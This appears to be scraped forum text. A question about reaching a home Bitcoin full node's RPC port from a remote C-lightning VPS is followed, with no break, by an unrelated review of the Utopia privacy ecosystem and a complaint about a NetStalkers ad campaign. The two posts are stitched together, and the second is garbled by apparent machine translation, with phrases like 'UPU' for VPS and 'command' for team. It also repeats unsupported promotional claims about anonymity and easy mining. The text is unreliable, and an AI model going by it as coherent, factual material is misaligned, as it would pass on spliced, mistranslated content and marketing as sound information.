I am running my bitcoin full node on my Windows 10 pc. My ip address is dynamic. I am running C-lightning on a remote vps. How can I use my full node (in server mode) for my C-lightning instance? Can I use ngrok to expose the port for rpc connections to it so I don't have to run bitcoind and download blockchain on my vps in conjuction with C-lightning since my vps does not have a big enough hdd to support the blockchain download? I have opened the port on router so local machines can access it but remote machines obviously cannot connect to my node. Can I use putty? Easyphp webserver? Tor hidden server?

Any ideas will help......

Utopia, 1984 Group, bad PR, 1984 Group and [NetStalkers] media garbage

Utopia, 1984 Group, bad PR, 1984 Group and [NetStalkers] media garbage
What would you understand immediately reading my post, I do not want to throw mud at the program or the team of 1984. I just want to explain to everyone that you need to look for advantages in everything and bring the matter to a logical conclusion. And the most important thing is to be committed to your work. And if you choose any product, you must be faithful to it to the end. Be the captains who are to the end with the ship, not the rats running from it.

Hello
In today's post, I would like to tell an interesting story that there is really worthwhile software in the world, what marketing is wrong, and how it is bad to turn to wrong media personalities. Of course, most people know about it. But I think this should be publicly shown, maybe for many and will be useful in the future.

But every cloud has a silver lining. In any case, I think this will be a good stress test for the web. So I can say that even if a bad PR company gives a good result.

Let's start from the very beginning, namely from the software Utopia and the 1984 Group. Of course, little is known about them; more precisely, practically nothing is known. But there is a brief information about her. All of course taken only from the official beta of the portal and block hackology
Spoiler for compact post) About Utopia ecosystem
Utopia – Anti 1984 Ecosystem
Utopia is a decentralized peer-to-peer network, With Utopia you can send instant text and voice messages, transfer files, create group chats and channels, send emails and conduct a private discussion. https://preview.redd.it/8q7ljch6rmc31.jpg?width=1366&format=pjpg&auto=webp&s=2bcc4896fa74bb5d2ca23c4c9414fcd4d015ab41

All those who value their data privacy would find this useful including activists and journalists knowing that their data is going straight to the designated user and no 3rd party can intercept their data. Currently the limit set for the attachments is 100 MB but as per the team it may be increased in future.

uWallet (Utopia Wallet)
All financial functionality can be found in Utopia built-in uWallet. uWallet allows you to make and accept payments denominated in Utopia cryptocurrency ‘Crypton‘, accept payments at your website, pay by Crypto Cards without revealing your Identity or bill fellow Utopia users for your services. With uWallet you can store value in Cryptons, receive mining rewards, use uVouchers, request payments and accept payments using the built-in API.

Utopia Mining – Crypton
Utopia has an inbuilt cryptocurrency called Crypton (CRP), which is proof-of-stake therefore a modest machine can also be used to mine cryptons through the GUI based Utopia application or with terminal based Mining bot which comes with the application.

https://preview.redd.it/aadlqb8crmc31.jpg?width=814&format=pjpg&auto=webp&s=2a100b98b2d912898d1b4a316f05f999846ab7b1

Utopia rewards users that support the ecosystem through Mining by emission of new Cryptons. When you run your Utopia software or bot you will receive your share of collective reward. Mining does not slow your computer down and is environmentally friendly. You may also run a number of bots at several servers or computers to multiply the Crypton mining speed.

https://preview.redd.it/2yktqfkermc31.jpg?width=1024&format=pjpg&auto=webp&s=c099c8439d25ea1e95682c14116d812f85180dc6

uNS (Utopia Naming System)
Utopia has introduced uNS (Utopia Naming System) which is a unique naming system and independent from the conventional Domain Naming System. DNS is subject to pressure and censorship from less than prefect international laws. Domains can be revoked or suspended due to multiple reasons, such as non-response to WhoIS inquiry or other register policies, non-payment, government actions and so on.
uNS, in contrast, is a truly decentralized non-censored registry hosted by Utopia Network participants with no expiration dates, renewal fees, suspensions and revocations. There is only one rule: First come, First served.

https://preview.redd.it/pfwstp5grmc31.jpg?width=1024&format=pjpg&auto=webp&s=1e282b2ad57f61ae3e4a114e75a96e20f7fc3a73

uNS registered name should be unique. You may register as many uNS registered names as you want while registration is not free and costs are paid in crypton:
Single letter uNS costs 1000 CRP
Two letter uNS costs 500 CRP
Three letter uNS costs 5 CRP
Four letter or more costs 0.1 CRP

Miscellaneous Features
Making Groups, Adding users, Chatting and Emailing, Sending Mails and Mining Cryptons might be the highlights but Utopia claims to be an ecosystem therefore they had to incorporate many more features so that users of Utopia ecosystem do not feel the need to go out of the system. List of other useful features within the Utopia Application are listed
Packet Forwarding : uNS Manager lists option of ‘Packet Forwarding’ which is an internal system allowing any utopian user to host a website which can be accessed by the Idyll browser, the naming system of the website is explained above, if you register hackology uNS you can make a website and it will open when you visit http://hackology/ and that is it. This option allows to tunnel any kind of data between users in ecosystem, making possible to host different types of resources including websites inside Utopia Network. At the time of writing few fellow Utopia users made Utopia sites which can be accessed at http://trade/ and at http://crystalforest

File Manager : All files which are sent or received in Utopia can be accessed from the builtin file manager which also includes an image viewer. As of now the file transfers are limited to 100MB.
Voice Notes : Utopia also supports sending and receiving of Voice messages which you can send to those who are added with you.
Dark Theme : The program comes in standard theme but how can they miss out a Dark Theme for the privacy savvy ? Users can opt for dark theme by going to Tools > Settings > Interface and selecting the ‘Dark Space‘ theme
Utopia API : Utopia comes with a comprehensive API for users to incorporate in their own projects. For instance, using API you can accept payments denominated in Crypton at your website, automatically manage your channels, send instant messages and much more. To get started once you enable the API you can also access the API documentation.
Network Fee Structure : Utopia provides us with an option to view all the network enforced fee and they are updated live on the network as the fee structure changes, thus one can stay updated with the current fee structure. You can access the Network Fee from uWallet > Treasury Data > Network Fee

Game : Utopia also supports in-app games which can be played in multiplayer, as of writing there is a working Chess game.

You can find more about Utopia on Hackology Blog.

Well, now I want to say personally my opinion after using Utopia.

It is very difficult to judge a product at the beta test stage, but at the moment I can highlight both the pros and cons of both the program and the team that develops it. I want to notice that this is my subjective opinion and you can or may not share it. So, let's begin:

Advantages:
  1. In principle, everything is really anonymous, as far as can be judged really using this software.
  2. Non-indexable channels (If you make it private and hide it from the search) at least we tested it inside the ecosystem. To find even by keywords is not real
  3. Non-indexable pages that you create. If you do not have a direct link, find a site even in the global search is not possible
  4. Easy mining of krypton. Even the weakest computers do not load, very comfortable
  5. Convenient system of anonymity of user information (Without exchange of public keys, even the avatar will not work)
  6. An easy-to-learn interface that arrived to us from 2004 (Old School will understand and appreciate)
  7. In fact, it reminds the decentralized Internet and may well become such with the proper development
  8. Inside the ecosystem there are no labels and notions of who is who, which simplifies the interaction within it
  9. Intervention from outside is at least very difficult, tried methods known to us, failed
  10. Indeed similar to a decentralized ecosystem.
  11. The team quickly fix problems
  12. Availability of detailed and collapsible instructions to all APIs within the ecosystem

There are many advantages and if I list everything, the post will be unrealistically large, therefore I have identified the main ones, and everyone after use must decide for himself what he liked.

And now about the shortcomings, they will be more likely related to common problems than specifically to the software or the command:

  1. Many functions that will have to be mastered by yourself, almost 0 guides
  2. The reaction of the team to the problems through the support leaves much to be desired
  3. The presence of bugs (not critical and absolutely, just not pleasant, both visually and in use)
  4. Not the right choice of PR company to promote software
  5. The team is known for development but is not good friends with product promotion.
  6. Localization, while only English (Well, this is a lesser problem)
  7. Absence of the familiar function (for example, attached videos and the like)
  8. All traffic from the site, even if you put it on the UPU goes through you, and in fact it denies anonymity. Why is this a disadvantage? Not only which VPS will agree that you would put Utopia, because the software scans the ports, which is forbidden without identification on most of the UPU. This is problem. If you put on the UPU, of course, the ends will not come to you, but if Utopia is on your car and the site is on the UPU, all site traffic will go through your public IP, which does not promise any anonymity.

While this is the most powerful problems of utopia, there may be more petty, but it is really not significant.

And now let's talk about NetStalkers, and here they are, because in the title they are.

The fact is that the 1984 Group bought advertising from this media team. I’ll say right away that I have nothing against the truly existing NetStalkers movement, now it concerns only the YouTube media community. So, having bought advertising from this wretched, deceitful and hypocritical community, Utopi had problems, because lovers of free-mining mining, children and inadequacies from all over the CIS and their usefulness were even zero, rushed into the software, moreover, all this garbage put a system on the blades because of spam, a huge amount of spam for which the 1984 Group was not ready. This is actually a terrible move.

Our small team very much hopes that this team can still draw conclusions from this, since only we worked, we chose the most adequate and interested contingent for this software from the CIS and we hope that in the future we will continue to cooperate with them.

If you like this post, I will continue to conduct similar topics and develop these areas, perhaps I will write guides on Utopia and will support this direction.

At the moment, because of the bad PR campaigns from the media slag community, the CIS, they no longer approve traffic, however, it’s even embarrassing to say that it’s from the CIS because such a manifestation of our community leaves much to be desired and even shows us adequate people in extremely bad light .
